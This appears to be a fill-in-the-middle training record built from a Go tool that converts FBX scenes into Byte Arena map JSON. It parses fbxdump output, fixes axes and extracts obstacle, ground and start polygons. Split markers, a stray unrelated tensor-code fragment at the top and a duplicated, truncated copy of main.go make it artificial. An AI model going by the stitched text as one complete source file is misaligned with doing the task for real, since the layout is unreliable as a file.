oter := NewFlatIterator(ot.AP)
chs = append(chs, oter.Chan())
}
t.doViewStack(retVal, axisStride, batches, ch, others, chs)
return retVal
}
| {
v.reshape(v.shape[0], 1)
} | conditional_block |
main.go | package main
import (
"bytes"
"encoding/json"
"flag"
"fmt"
"os"
"os/exec"
"regexp"
"runtime"
"sort"
"strconv"
"strings"
"time"
"github.com/go-gl/mathgl/mgl64"
"github.com/bytearena/core/common/types/mapcontainer"
"github.com/bytearena/core/common/utils/number"
polygonutils "github.com/bytearena/core/common/utils/polygon"
"github.com/bytearena/core/common/utils/vector"
)
const AxisX = 0
const AxisY = 1
const AxisZ = 2
// Blender Sign FBX Sign
// CoordAxis AxisX = 0 1 AxisX = 0 1
// UpAxis AxisZ = 2 1 AxisY = 1 1
// FrontAxis AxisY = 1 -1 AxisZ = 2 1
// => For blender, FrontAxis is 1 when pointing away from the camera, and -1 when pointing towards the camera; it's the opposite for FBX
// => yet blenders does not set the sign to -1 on FrontAxis when exporting; see https://developer.blender.org/T43935 ?
// (1,0,0) (1,0,0)
// (0,1,0) (0,0,-1)
// (0,0,1) (0,1,0)
// => -z (fbx) becomes y (corrected vertice)
// => y (fbx) becomes z
func fixCoordSystem(p vertexType) vertexType {
return vertexType{
p[0],
-1.0 * p[2],
p[1],
}
}
func main() {
var fbxdumpCmd string
switch runtime.GOOS {
case "darwin":
{
fbxdumpCmd = "./bin/fbxdump-macos"
}
case "linux":
{
fbxdumpCmd = "./bin/fbxdump-linux"
}
default:
{
fmt.Println("map-builder-fbx may be used only on linux or macos")
os.Exit(1)
}
}
sourcefilepath := flag.String("in", "", "Input fbx file; required")
flag.Parse()
if *sourcefilepath == "" {
fmt.Println("--in is required; ex: --in ~/map.fbx")
os.Exit(1)
}
stderr := &bytes.Buffer{}
stdout := &bytes.Buffer{}
cmd := exec.Command(
fbxdumpCmd,
*sourcefilepath,
)
cmd.Env = nil
cmd.Stdin = os.Stdin
cmd.Stdout = stdout
cmd.Stderr = stderr
err := cmd.Run()
if err != nil {
fmt.Println("Error: error during fbxdump; " + stderr.String())
os.Exit(1)
}
// fmt.Println(stdout)
// os.Exit(0)
geometries := make(map[int64]*fbxGeometry)
models := make(map[int64]*fbxModel)
var f map[string]json.RawMessage
json.Unmarshal(stdout.Bytes(), &f)
var topchildren []marshChild
json.Unmarshal(f["children"], &topchildren)
scene := fbxScene{}
for _, topchild := range topchildren {
if topchild.Name == "GlobalSettings" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Properties70" {
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "P" {
var propname string
json.Unmarshal(child3.Properties[0].Value, &propname)
var valuePointer *int
switch propname {
case "UpAxis":
valuePointer = &scene.upAxis
case "UpAxisSign":
valuePointer = &scene.upAxisSign
case "FrontAxis":
valuePointer = &scene.frontAxis
case "FrontAxisSign":
valuePointer = &scene.frontAxisSign
case "CoordAxis":
valuePointer = &scene.coordsAxis
case "CoordAxisSign":
valuePointer = &scene.coordsAxisSign
default:
continue
}
var value int
json.Unmarshal(child3.Properties[4].Value, &value)
*valuePointer = value
}
}
}
}
}
if topchild.Name == "Objects" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Geometry" {
geometry := fbxGeometry{}
json.Unmarshal(child2.Properties[0].Value, &geometry.id)
json.Unmarshal(child2.Properties[1].Value, &geometry.name)
// cut name up to \null
geometry.name = strings.Split(geometry.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Vertices" {
json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
}
if child3.Name == "PolygonVertexIndex" {
json.Unmarshal(child3.Properties[0].Value, &geometry.indices)
if len(geometry.indices) > 0 {
poly := make(faceType, 0)
for _, geometryIndex := range geometry.indices {
endPoly := false
if geometryIndex < 0 {
// https://www.scratchapixel.com/lessons/3d-basic-rendering/introduction-polygon-mesh/polygon-mesh-file-formats
geometryIndex = geometryIndex*-1 - 1
endPoly = true
}
offset := geometryIndex * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
if endPoly {
geometry.faces = append(geometry.faces, poly)
poly = make(faceType, 0)
}
}
if len(poly) > 0 {
geometry.faces = append(geometry.faces, poly)
}
} else {
poly := make(faceType, 0)
for i := 0; i < len(geometry.vertices)/3; i++ {
offset := i * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
}
geometry.faces = append(geometry.faces, poly)
}
}
}
geometries[geometry.id] = &geometry
} else if child2.Name == "Model" {
model := fbxModel{}
json.Unmarshal(child2.Properties[0].Value, &model.id)
json.Unmarshal(child2.Properties[1].Value, &model.name)
// cut name up to \null
model.name = strings.Split(model.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Properties70" {
//json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
transform := fbxTransform{}
var children4 []marshChild
json.Unmarshal(child3.Children, &children4)
for _, child4 := range children4 {
if len(child4.Properties) != 7 {
// always 7 properties on a transform aspect child; example:
// "properties": [
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "" },
// { "type": "S", "value": "A" },
// { "type": "D", "value": 407.526001 },
// { "type": "D", "value": 578.080200 },
// { "type": "D", "value": 25.511261 }
// ]
continue
}
var kind string
json.Unmarshal(child4.Properties[0].Value, &kind)
switch kind {
case "Lcl Translation":
{ // position (local translation)
json.Unmarshal(child4.Properties[4].Value, &transform.translation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.translation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.translation[2])
transform.translation = fixCoordSystem(transform.translation)
}
case "Lcl Rotation":
{ // position (local rotation)
json.Unmarshal(child4.Properties[4].Value, &transform.rotation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.rotation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.rotation[2])
transform.rotation = fixCoordSystem(transform.rotation)
}
case "Lcl Scaling":
{ // position (local scaling)
json.Unmarshal(child4.Properties[4].Value, &transform.scaling[0])
json.Unmarshal(child4.Properties[5].Value, &transform.scaling[1])
json.Unmarshal(child4.Properties[6].Value, &transform.scaling[2])
transform.scaling = fixCoordSystem(transform.scaling)
}
}
}
model.transform = transform
}
}
models[model.id] = &model
}
}
}
}
for _, topchild := range topchildren {
if topchild.Name != "Connections" {
continue
}
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name != "C" {
continue
}
var idOne int64
var idTwo int64
json.Unmarshal(child2.Properties[1].Value, &idOne)
json.Unmarshal(child2.Properties[2].Value, &idTwo)
// Si idOne => model && idTwo empty => model sans parent
// si idOne => geometry && idTwo model => idTwo.geometry = idOne
// si idOne => model && idTwo model => idOne.parent = idTwo
_, idOneIsModel := models[idOne]
_, idOneIsGeometry := geometries[idOne]
idTwoIsEmpty := idTwo == 0
_, idTwoIsModel := models[idTwo]
if idOneIsModel && idTwoIsEmpty {
modelOne, _ := models[idOne]
modelOne.parent = nil
} else if idOneIsGeometry && idTwoIsModel {
geometryOne, _ := geometries[idOne]
modelTwo, _ := models[idTwo]
modelTwo.geometry = geometryOne
} else if idOneIsModel && idTwoIsModel {
modelOne, _ := models[idOne]
modelTwo, _ := models[idTwo]
modelOne.parent = modelTwo
modelTwo.children = append(modelTwo.children, modelOne)
}
}
}
modelsObstacle := make([]*fbxModel, 0)
modelsGround := make([]*fbxModel, 0)
modelsStart := make([]*fbxModel, 0)
for _, model := range models {
if model.geometry == nil {
continue
}
modelnames := getNodeNames(model)
if modelnames.Contains("ba:obstacle") > -1 {
modelsObstacle = append(modelsObstacle, model)
}
if modelnames.Contains("ba:ground") > -1 {
modelsGround = append(modelsGround, model)
}
if modelnames.Contains("ba:start") > -1 {
modelsStart = append(modelsStart, model)
}
}
grounds := make([]mapcontainer.MapGround, 0)
obstacles := make([]mapcontainer.MapObstacleObject, 0)
starts := make([]mapcontainer.MapStart, 0)
for _, model := range modelsObstacle {
//fmt.Println("# " + model.name)
obstacles = append(obstacles, mapcontainer.MapObstacleObject{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, model := range modelsGround {
//fmt.Println("# " + model.name)
grounds = append(grounds, mapcontainer.MapGround{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, start := range modelsStart {
origin := vertexType{0, 0, 0}.applyTransform(start.getFullTransform())
starts = append(starts, mapcontainer.MapStart{
Id: strconv.Itoa(int(start.id)),
Name: start.name,
Point: mapcontainer.MapPoint{
origin[0],
origin[1],
},
})
}
builtmap := mapcontainer.MapContainer{}
builtmap.Meta.Readme = "Byte Arena Map"
builtmap.Meta.Kind = "deathmatch"
builtmap.Meta.MaxContestants = len(starts)
builtmap.Meta.Date = time.Now().Format(time.RFC3339)
builtmap.Data.Grounds = grounds
builtmap.Data.Starts = starts
builtmap.Data.Obstacles = obstacles
bjsonmap, _ := json.MarshalIndent(builtmap, "", " ")
fmt.Println(string(bjsonmap))
}
func debugPolygonSVG(polygon []vector.Vector2) {
fmt.Println("<svg height='700' width='500'><g transform='translate(700,350) scale(4)'>")
for i := 0; i < len(polygon); i++ {
nextIndex := 0
if i == len(polygon)-1 {
nextIndex = 0
} else {
nextIndex = i + 1
}
a := polygon[i]
b := polygon[nextIndex]
fmt.Println(fmt.Sprintf("<line title='Edge #%d' x1=\"%f\" y1=\"%f\" x2=\"%f\" y2=\"%f\" style=\"stroke: black; stroke-width: 0.1;\" />", i+1, a.GetX()*10, a.GetY()*10, b.GetX()*10, b.GetY()*10))
}
fmt.Println("</g></svg>")
}
type vertexType [3]float64
type edgeType [2]vertexType
type faceType []vertexType
func (a vertexType) Equals(b vertexType) bool {
return number.FloatEquals(a[0], b[0]) && number.FloatEquals(a[1], b[1]) && number.FloatEquals(a[2], b[2])
}
func (p vertexType) String() string |
func (p vertexType) applyTransform(transform mgl64.Mat4) vertexType {
res := mgl64.TransformCoordinate(
mgl64.Vec3{
p[0],
p[1],
p[2],
},
transform,
)
return vertexType{
res.X(),
res.Y(),
res.Z(),
}
}
func (a edgeType) Equals(b edgeType) bool {
return a[0].Equals(b[0]) && a[1].Equals(b[1]) || a[1].Equals(b[0]) && a[0].Equals(b[1])
}
func (face faceType) GetEdges() []edgeType {
edges := make([]edgeType, 0)
for i := 0; i < len(face); i++ {
nextIndex := i + 1
if i == len(face)-1 {
nextIndex = 0
}
edges = append(edges, edgeType{face[i], face[nextIndex]})
}
return edges
}
func (poly faceType) applyTransform(transform mgl64.Mat4) faceType {
res := make(faceType, len(poly))
for i, p := range poly {
res[i] = p.applyTransform(transform)
}
return res
}
type fbxScene struct {
upAxis int
upAxisSign int
frontAxis int
frontAxisSign int
coordsAxis int
coordsAxisSign int
}
type fbxTransform struct {
translation vertexType
rotation vertexType
scaling vertexType
}
type fbxModel struct {
parent *fbxModel
children []*fbxModel
id int64
name string
transform fbxTransform
geometry *fbxGeometry
}
func (model *fbxModel) getFullTransform() mgl64.Mat4 {
// ordre : local -> global
mats := make([]mgl64.Mat4, 0)
mats = append(mats, mgl64.Scale3D(0.01, 0.01, 0.01))
current := model
for current != nil {
var scale mgl64.Mat4
if current.transform.scaling[0] == 0.0 && current.transform.scaling[1] == 0.0 && current.transform.scaling[2] == 0.0 {
scale = mgl64.Scale3D(1, 1, 1)
} else {
scale = mgl64.Scale3D(current.transform.scaling[0], current.transform.scaling[1], current.transform.scaling[2])
}
rotx := mgl64.HomogRotate3DX(mgl64.DegToRad(current.transform.rotation[0]))
roty := mgl64.HomogRotate3DY(mgl64.DegToRad(current.transform.rotation[1]))
rotz := mgl64.HomogRotate3DZ(mgl64.DegToRad(current.transform.rotation[2]))
trans := mgl64.Translate3D(current.transform.translation[0]/100.0, current.transform.translation[1]/100.0, current.transform.translation[2]/100.0)
mat := mgl64.Ident4().
Mul4(trans).
Mul4(rotz).
Mul4(roty).
Mul4(rotx).
Mul4(scale)
mats = append(mats, mat)
current = current.parent
}
mat := mgl64.Ident4()
for i := len(mats) - 1; i >= 0; i-- {
mat = mat.Mul4(mats[i])
}
return mat
}
type fbxGeometry struct {
id int64
name string
vertices []float64
indices []int
faces []faceType
}
func (g *fbxGeometry) getTransformedFaces(transform mgl64.Mat4) []faceType {
res := make([]faceType, len(g.faces))
for i, face := range g.faces {
res[i] = face.applyTransform(transform)
}
return res
}
type marshChild struct {
Name string `json:"name"`
Children json.RawMessage `json:"children"`
Properties []marshProperty `json:"properties"`
}
type marshProperty struct {
Type string `json:"type"`
Value json.RawMessage `json:"value"`
}
///////////////////////////////////////////////////////////////////////////////
func makeSortedEdge(a, b vertexType) edgeType {
var min, max = a, b
if min[0] > max[0] {
max, min = min, max
} else if min[0] == max[0] && min[1] > max[1] {
max, min = min, max
} else if min[0] == max[0] && min[1] == max[1] && min[2] > max[2] {
max, min = min, max
}
return edgeType{
min,
max,
}
}
func polygonFrom2DMesh(faces []faceType) mapcontainer.MapPolygon {
edges := make([]edgeType, 0)
polygon := make([]vector.Vector2, 0)
for _, face := range faces {
edges = append(edges, face.GetEdges()...)
}
// sort edges
sortedEdges := make([]edgeType, len(edges))
for i, edge := range edges {
sortedEdges[i] = makeSortedEdge(edge[0], edge[1])
}
type edgecount struct {
count int
edge edgeType
}
countedEdges := make(map[string]*edgecount)
for _, edge := range sortedEdges {
hash := getKeyForEdge(edge)
//fmt.Println("HASH", hash)
_, ok := countedEdges[hash]
if !ok {
countedEdges[hash] = &edgecount{
count: 1,
edge: edge,
}
} else {
countedEdges[hash].count++
}
}
//spew.Dump(points)
//spew.Dump(countedEdges)
outlineEdges := make([]edgeType, 0)
// stabilizing map iteration (easier for debug)
var countedEdgesKeys []string
for k := range countedEdges {
countedEdgesKeys = append(countedEdgesKeys, k)
}
sort.Strings(countedEdgesKeys)
for _, countedEdgeKey := range countedEdgesKeys {
countedEdge := countedEdges[countedEdgeKey]
if countedEdge.count == 1 {
outlineEdges = append(outlineEdges, countedEdge.edge)
}
}
if len(outlineEdges) == 0 {
return mapcontainer.MapPolygon{}
}
/////////////////////////////////////////////////////////////
// putting edges in the right order for the polygon
/////////////////////////////////////////////////////////////
outline := make([]edgeType, 0)
// taking the leftmost point as a starting point
var leftMostEdge *edgeType
for _, edge := range outlineEdges {
if leftMostEdge == nil || leftMostEdge[0][0] > edge[0][0] {
leftMostEdge = &edge
}
}
outline = append(outline, *leftMostEdge)
done := false
for i := 1; i < len(outlineEdges); i++ {
head := outline[i-1]
found := false
for _, edge := range outlineEdges {
if head.Equals(edge) {
continue
}
if head[1].Equals(edge[0]) {
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
} else if head[1].Equals(edge[1]) {
// swap edge points
edge[0], edge[1] = edge[1], edge[0]
outline = append(outline, edge)
found = true
done = edge.Equals(outline[0])
break
}
}
if !found {
fmt.Println("Next edge not found in outlinesFrom2DMesh for", head, outlineEdges)
//os.Exit(1)
break
}
if done {
break
}
}
// /////////////////////////////////////////////////////////////
// /////////////////////////////////////////////////////////////
// // convert edges to points (vector2)
for _, edge := range outline {
polygon = append(polygon, vector.MakeVector2(edge[0][0], edge[0][1]))
}
// // ensure winding
polygon, err := polygonutils.EnsureWinding(polygonutils.CartesianSystemWinding.CCW, polygon)
if err != nil {
fmt.Println(err)
return mapcontainer.MapPolygon{}
}
points := make([]mapcontainer.MapPoint, 0)
for _, vec2 := range polygon {
points = append(points, mapcontainer.MapPoint{vec2.GetX(), vec2.GetY()})
}
return mapcontainer.MapPolygon{Points: points}
}
func getKeyForEdge(edge edgeType) string {
return fmt.Sprintf("%.5f_%.5f_%.5f_%.5f", edge[0][0], edge[0][1], edge[1][0], edge[1][1])
}
///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
type ModelNameCollection []string
func (c ModelNameCollection) Contains(search string) int {
for i, group := range c {
if strings.Contains(group, search) {
return i
}
}
return -1
}
func getNodeNames(i *fbxModel) ModelNameCollection {
var model *fbxModel = i
res := make(ModelNameCollection, 0)
for model != nil {
if model.name != "" {
res = append(res, model.name)
}
model = model.parent
}
return res
}
type ModelNameFunction struct {
Function string
Args json.RawMessage
Original string
}
func (c ModelNameCollection) GetFunctions() []ModelNameFunction {
funcs := make([]ModelNameFunction, 0)
r := regexp.MustCompile("^ba:([a-zA-Z]+)\\((.*?)\\)$")
for _, group := range c {
parts := strings.Split(group, "-")
for _, part := range parts {
if r.MatchString(part) {
matches := r.FindStringSubmatch(part)
funcs = append(funcs, ModelNameFunction{
Function: matches[1],
Args: json.RawMessage("[" + matches[2] + "]"),
Original: part,
})
}
}
}
return funcs
}
| {
return fmt.Sprintf("<vertex(%f, %f, %f)>", p[0], p[1], p[2])
} | identifier_body |
main.go | package main
import (
"bytes"
"encoding/json"
"flag"
"fmt"
"os"
"os/exec"
"regexp"
"runtime"
"sort"
"strconv"
"strings"
"time"
"github.com/go-gl/mathgl/mgl64"
"github.com/bytearena/core/common/types/mapcontainer"
"github.com/bytearena/core/common/utils/number"
polygonutils "github.com/bytearena/core/common/utils/polygon"
"github.com/bytearena/core/common/utils/vector"
)
const AxisX = 0
const AxisY = 1
const AxisZ = 2
// Blender Sign FBX Sign
// CoordAxis AxisX = 0 1 AxisX = 0 1
// UpAxis AxisZ = 2 1 AxisY = 1 1
// FrontAxis AxisY = 1 -1 AxisZ = 2 1
// => For blender, FrontAxis is 1 when pointing away from the camera, and -1 when pointing towards the camera; it's the opposite for FBX
// => yet blenders does not set the sign to -1 on FrontAxis when exporting; see https://developer.blender.org/T43935 ?
// (1,0,0) (1,0,0)
// (0,1,0) (0,0,-1)
// (0,0,1) (0,1,0)
// => -z (fbx) becomes y (corrected vertice)
// => y (fbx) becomes z
func fixCoordSystem(p vertexType) vertexType {
return vertexType{
p[0],
-1.0 * p[2],
p[1],
}
}
func main() {
var fbxdumpCmd string
switch runtime.GOOS {
case "darwin":
{
fbxdumpCmd = "./bin/fbxdump-macos"
}
case "linux":
{
fbxdumpCmd = "./bin/fbxdump-linux"
}
default:
{
fmt.Println("map-builder-fbx may be used only on linux or macos")
os.Exit(1)
}
}
sourcefilepath := flag.String("in", "", "Input fbx file; required")
flag.Parse()
if *sourcefilepath == "" {
fmt.Println("--in is required; ex: --in ~/map.fbx")
os.Exit(1)
}
stderr := &bytes.Buffer{}
stdout := &bytes.Buffer{}
cmd := exec.Command(
fbxdumpCmd,
*sourcefilepath,
)
cmd.Env = nil
cmd.Stdin = os.Stdin
cmd.Stdout = stdout
cmd.Stderr = stderr
err := cmd.Run()
if err != nil {
fmt.Println("Error: error during fbxdump; " + stderr.String())
os.Exit(1)
}
// fmt.Println(stdout)
// os.Exit(0)
geometries := make(map[int64]*fbxGeometry)
models := make(map[int64]*fbxModel)
var f map[string]json.RawMessage
json.Unmarshal(stdout.Bytes(), &f)
var topchildren []marshChild
json.Unmarshal(f["children"], &topchildren)
scene := fbxScene{}
for _, topchild := range topchildren {
if topchild.Name == "GlobalSettings" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Properties70" {
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "P" {
var propname string
json.Unmarshal(child3.Properties[0].Value, &propname)
var valuePointer *int
switch propname {
case "UpAxis":
valuePointer = &scene.upAxis
case "UpAxisSign":
valuePointer = &scene.upAxisSign
case "FrontAxis":
valuePointer = &scene.frontAxis
case "FrontAxisSign":
valuePointer = &scene.frontAxisSign
case "CoordAxis":
valuePointer = &scene.coordsAxis
case "CoordAxisSign":
valuePointer = &scene.coordsAxisSign
default:
continue
}
var value int
json.Unmarshal(child3.Properties[4].Value, &value)
*valuePointer = value
}
}
}
}
}
if topchild.Name == "Objects" {
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name == "Geometry" {
geometry := fbxGeometry{}
json.Unmarshal(child2.Properties[0].Value, &geometry.id)
json.Unmarshal(child2.Properties[1].Value, &geometry.name)
// cut name up to \null
geometry.name = strings.Split(geometry.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Vertices" {
json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
}
if child3.Name == "PolygonVertexIndex" {
json.Unmarshal(child3.Properties[0].Value, &geometry.indices)
if len(geometry.indices) > 0 {
poly := make(faceType, 0)
for _, geometryIndex := range geometry.indices {
endPoly := false
if geometryIndex < 0 {
// https://www.scratchapixel.com/lessons/3d-basic-rendering/introduction-polygon-mesh/polygon-mesh-file-formats
geometryIndex = geometryIndex*-1 - 1
endPoly = true
}
offset := geometryIndex * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
if endPoly {
geometry.faces = append(geometry.faces, poly)
poly = make(faceType, 0)
}
}
if len(poly) > 0 {
geometry.faces = append(geometry.faces, poly)
}
} else {
poly := make(faceType, 0)
for i := 0; i < len(geometry.vertices)/3; i++ {
offset := i * 3
p := vertexType{geometry.vertices[offset+0], geometry.vertices[offset+1], geometry.vertices[offset+2]}
poly = append(poly, fixCoordSystem(p))
}
geometry.faces = append(geometry.faces, poly)
}
}
}
geometries[geometry.id] = &geometry
} else if child2.Name == "Model" {
model := fbxModel{}
json.Unmarshal(child2.Properties[0].Value, &model.id)
json.Unmarshal(child2.Properties[1].Value, &model.name)
// cut name up to \null
model.name = strings.Split(model.name, "\x00")[0]
var children3 []marshChild
json.Unmarshal(child2.Children, &children3)
for _, child3 := range children3 {
if child3.Name == "Properties70" {
//json.Unmarshal(child3.Properties[0].Value, &geometry.vertices)
transform := fbxTransform{}
var children4 []marshChild
json.Unmarshal(child3.Children, &children4)
for _, child4 := range children4 {
if len(child4.Properties) != 7 {
// always 7 properties on a transform aspect child; example:
// "properties": [
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "Lcl Translation" },
// { "type": "S", "value": "" },
// { "type": "S", "value": "A" },
// { "type": "D", "value": 407.526001 },
// { "type": "D", "value": 578.080200 },
// { "type": "D", "value": 25.511261 }
// ]
continue
}
var kind string
json.Unmarshal(child4.Properties[0].Value, &kind)
switch kind {
case "Lcl Translation":
{ // position (local translation)
json.Unmarshal(child4.Properties[4].Value, &transform.translation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.translation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.translation[2])
transform.translation = fixCoordSystem(transform.translation)
}
case "Lcl Rotation":
{ // position (local rotation)
json.Unmarshal(child4.Properties[4].Value, &transform.rotation[0])
json.Unmarshal(child4.Properties[5].Value, &transform.rotation[1])
json.Unmarshal(child4.Properties[6].Value, &transform.rotation[2])
transform.rotation = fixCoordSystem(transform.rotation)
}
case "Lcl Scaling":
{ // position (local scaling)
json.Unmarshal(child4.Properties[4].Value, &transform.scaling[0])
json.Unmarshal(child4.Properties[5].Value, &transform.scaling[1])
json.Unmarshal(child4.Properties[6].Value, &transform.scaling[2])
transform.scaling = fixCoordSystem(transform.scaling)
}
}
}
model.transform = transform
}
}
models[model.id] = &model
}
}
}
}
for _, topchild := range topchildren {
if topchild.Name != "Connections" {
continue
}
var children2 []marshChild
json.Unmarshal(topchild.Children, &children2)
for _, child2 := range children2 {
if child2.Name != "C" {
continue
}
var idOne int64
var idTwo int64
json.Unmarshal(child2.Properties[1].Value, &idOne)
json.Unmarshal(child2.Properties[2].Value, &idTwo)
// Si idOne => model && idTwo empty => model sans parent
// si idOne => geometry && idTwo model => idTwo.geometry = idOne
// si idOne => model && idTwo model => idOne.parent = idTwo
_, idOneIsModel := models[idOne]
_, idOneIsGeometry := geometries[idOne]
idTwoIsEmpty := idTwo == 0
_, idTwoIsModel := models[idTwo]
if idOneIsModel && idTwoIsEmpty {
modelOne, _ := models[idOne]
modelOne.parent = nil
} else if idOneIsGeometry && idTwoIsModel {
geometryOne, _ := geometries[idOne]
modelTwo, _ := models[idTwo]
modelTwo.geometry = geometryOne
} else if idOneIsModel && idTwoIsModel {
modelOne, _ := models[idOne]
modelTwo, _ := models[idTwo]
modelOne.parent = modelTwo
modelTwo.children = append(modelTwo.children, modelOne)
}
}
}
modelsObstacle := make([]*fbxModel, 0)
modelsGround := make([]*fbxModel, 0)
modelsStart := make([]*fbxModel, 0)
for _, model := range models {
if model.geometry == nil {
continue
}
modelnames := getNodeNames(model)
if modelnames.Contains("ba:obstacle") > -1 {
modelsObstacle = append(modelsObstacle, model)
}
if modelnames.Contains("ba:ground") > -1 {
modelsGround = append(modelsGround, model)
}
if modelnames.Contains("ba:start") > -1 {
modelsStart = append(modelsStart, model)
}
}
grounds := make([]mapcontainer.MapGround, 0)
obstacles := make([]mapcontainer.MapObstacleObject, 0)
starts := make([]mapcontainer.MapStart, 0)
for _, model := range modelsObstacle {
//fmt.Println("# " + model.name)
obstacles = append(obstacles, mapcontainer.MapObstacleObject{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, model := range modelsGround {
//fmt.Println("# " + model.name)
grounds = append(grounds, mapcontainer.MapGround{
Id: strconv.Itoa(int(model.id)),
Name: model.name,
Polygon: polygonFrom2DMesh(
model.geometry.getTransformedFaces(model.getFullTransform()),
),
})
}
for _, start := range modelsStart {
origin := vertexType{0, 0, 0}.applyTransform(start.getFullTransform())
starts = append(starts, mapcontainer.MapStart{
Id: strconv.Itoa(int(start.id)),
Name: start.name,
Point: mapcontainer.MapPoint{
origin[0],
origin[1],
},
})
}
builtmap := mapcontainer.MapContainer{}
builtmap.Meta.Readme = "Byte Arena Map"
builtmap.Meta.Kind = "deathmatch"
builtmap.Meta.MaxContestants = len(starts)
builtmap.Meta.Date = time.Now().Format(time.RFC3339)
builtmap.Data.Grounds = grounds
builtmap.Data.Starts = starts
builtmap.Data.Obstacles = obstacles
bjsonmap, _ := json.MarshalIndent(builtmap, "", " ")
fmt.Println(string(bjsonmap))
}
func debugPolygonSVG(polygon []vector.Vector2) {
fmt.Println("<svg height='700' width='500'><g transform='translate(700,350) scale(4)'>")
for i := 0; i < len(polygon); i++ {
nextIndex := 0
if i == len(polygon)-1 {
nextIndex = 0
} else {
nextIndex = i + 1
}
a := polygon[i]
b := polygon[nextIndex]
fmt.Println(fmt.Sprintf("<line title='Edge #%d' x1=\"%f\" y1=\"%f\" x2=\"%f\" y2=\"%f\" style=\"stroke: black; stroke-width: 0.1;\" />", i+1, a.GetX()*10, a.GetY()*10, b.GetX()*10, b.GetY()*10))
}
fmt.Println("</g></svg>")
}
type vertexType [3]float64
type edgeType [2]vertexType
type faceType []vertexType
func (a vertexType) Equals(b vertexType) bool {
return number.FloatEquals(a[0], b[0]) && number.FloatEquals(a[1], b[1]) && number.FloatEquals(a[2], b[2])
}
func (p vertexType) String() string {
return fmt.Sprintf("<vertex(%f, %f, %f)>", p[0], p[1], p[2])
}
func (p vertexType) applyTransform(transform mgl64.Mat4) vertexType {
res := mgl64.TransformCoordinate(
mgl64.Vec3{
p[0],
p[1],
p[2],
},
transform,
)
return vertexType{
res.X(),
res.Y(),
res.Z(),
}
}
func (a edgeType) Equals(b edgeType) bool {
return a[0].Equals(b[0]) && a[1].Equals(b[1]) || a[1].Equals(b[0]) && a[0].Equals(b[1])
}
func (face faceType) GetEdges() []edgeType {
edges := make([]edgeType, 0)
for i := 0; i < len(face); i++ {
nextIndex := i + 1
if i == len(face)-1 {
nextIndex = 0
}
edges = append(edges, edgeType{face[i], face[nextIndex]})
}
return edges
}
func (poly faceType) applyTransform(transform mgl64.Mat4) faceType {
res := make(faceType, len(poly))
for i, p := range poly {
res[i] = p.applyTransform(transform)
}
return res
}
type fbxScene struct {
upAxis int
upAxisSign int
frontAxis int
frontAxisSign int
coordsAxis int
coordsAxisSign int
}
type fbxTransform struct {
translation vertexType
rotation vertexType
scaling vertexType
}
type fbxModel struct {
parent *fbxModel
children []*fbxModel
id int64
name string
transform fbxTransform
geometry *fbxGeometry
}
func (model *fbxModel) getFullTransform() mgl64.Mat4 {
// ordre : local -> global
mats := make([]mgl64.Mat4, 0)
mats = append(mats, mgl64.Scale3D(0.01, 0.01, 0.01))
current := model
for current != nil {
var scale mgl64.Mat4
if current.transform.scaling[0] == 0.0 && current.transform.scaling[1] == 0.0 && current.transform.scaling[2] == 0.0 {
scale = mgl64.Scale3D(1, 1, 1)
} else {
scale = mgl64.Scale3D(current.transform.scaling[0], current.transform.scaling[1], current.transform.scaling[2])
}
rotx := mgl64.HomogRotate3DX(mgl64.DegToRad(current.transform.rotation[0]))
roty := mgl64.HomogRotate3DY(mgl64.DegToRad(current.transform.rotation[1]))
rotz := mgl64.HomogRotate3DZ(mgl64.DegToRad(current.transform.rotation[2]))
trans := mgl64.Translate3D(current.transform.translation[0]/100.0, current.transform.translation[1]/100.0, current.transform.translation[2]/100.0)
mat := mgl64.Ident4().
Mul4(trans).
Mul4(rotz).
Mul4(roty).
Mul4(rotx).
Mul4(scale)
mats = append(mats, mat)
current = current.parent
}
mat := mgl64.Ident4()
for i := len(mats) - 1; i >= 0; i-- {
mat = mat.Mul4(mats[i])
